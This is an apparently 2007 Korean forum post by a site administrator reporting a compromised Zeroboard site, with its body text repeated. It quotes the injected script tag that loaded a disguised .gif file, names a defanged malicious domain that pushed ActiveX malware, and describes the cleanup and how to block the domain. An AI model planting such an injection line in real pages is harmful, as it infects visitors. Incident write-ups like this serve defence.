칫솔
2007-10-27 05:36:21
+1
1834
서버에 바이러스 들어온거 같네요.
호스팅 업체에 연락해서 처리해야할 것 같아요.
사이트 오시는 분들은 ActiveX 설치요청 윈도우가 뜨면 모두 거부해 주세요.
증상:
제로보드 모든 페이지 열때 ActiveX 설치 요청창이 뜸
사용자 대응:
ActiveX 설치요청 윈도우가 뜨면 모두 거부
바이러스 작동 원리:
매 페이지에 아래 스크립트 코드 박힘.
<script language="javascript" type="text/javascript" src="images/admin_info.gif"></script>
images/admin_info.gif 라는 파일 열어보면
xxxhttpxxx://d.xin8.info/daipi/css.htm 불러들이게 되어 있는데
여기서 부터 컨트롤 설치되고 바이러스 유포되는 방식
원산지:
이거 중국인들이 만든 거 =,=;
전염방식:
이게 서버쪽에 전염되는 방식이 두 가지인데
우리 웹서버가 직접 공격당했을 수도 있고
우리 웹서버 근방에 서버가 공격당해서 우리 웹서버에서 나가는 패킷에
바이러스 코드 낑겨 넣는 경우가 있음.
두 가지 모두 확인해야 되는데 일단 호스팅 업체에 연락하면 처리해 줄 듯.
호스팅 업체에 연락해서 처리해야할 것 같아요.
사이트 오시는 분들은 ActiveX 설치요청 윈도우가 뜨면 모두 거부해 주세요.
증상:
제로보드 모든 페이지 열때 ActiveX 설치 요청창이 뜸
사용자 대응:
ActiveX 설치요청 윈도우가 뜨면 모두 거부
바이러스 작동 원리:
매 페이지에 아래 스크립트 코드 박힘.
<script language="javascript" type="text/javascript" src="images/admin_info.gif"></script>
images/admin_info.gif 라는 파일 열어보면
xxxhttpxxx://d.xin8.info/daipi/css.htm 불러들이게 되어 있는데
여기서 부터 컨트롤 설치되고 바이러스 유포되는 방식
원산지:
이거 중국인들이 만든 거 =,=;
전염방식:
이게 서버쪽에 전염되는 방식이 두 가지인데
우리 웹서버가 직접 공격당했을 수도 있고
우리 웹서버 근방에 서버가 공격당해서 우리 웹서버에서 나가는 패킷에
바이러스 코드 낑겨 넣는 경우가 있음.
두 가지 모두 확인해야 되는데 일단 호스팅 업체에 연락하면 처리해 줄 듯.
http://nbamania.gmy.cc/board/zboard.php?id=jabdamboard&no=46324
한창 어디에 감염 코드가 있는지 방황하다가 _head.php에 감염 코드가 있는 걸 발견해서 삭제했습니다. 괘씸한 놈 같으니, 한참 찾았네.
인터넷 유저들은 기타 포털 등에서도 이런 바이러스가 현재 유통되고 있다니 안전하게 자기 컴퓨터를 보호하세요. 인터넷 등록정보에서 보안탭으로 가시면 제한된 사이트가 있는데 여기에 "*.xin8.info"구문을 넣어서 차단해 주시면 됩니다.
일단 친구사이 웹 서버에서는 감염 코드를 삭제했습니다. 내일 서버 회사에 문의하여, 보안 방법을 마련하도록 하겠습니다.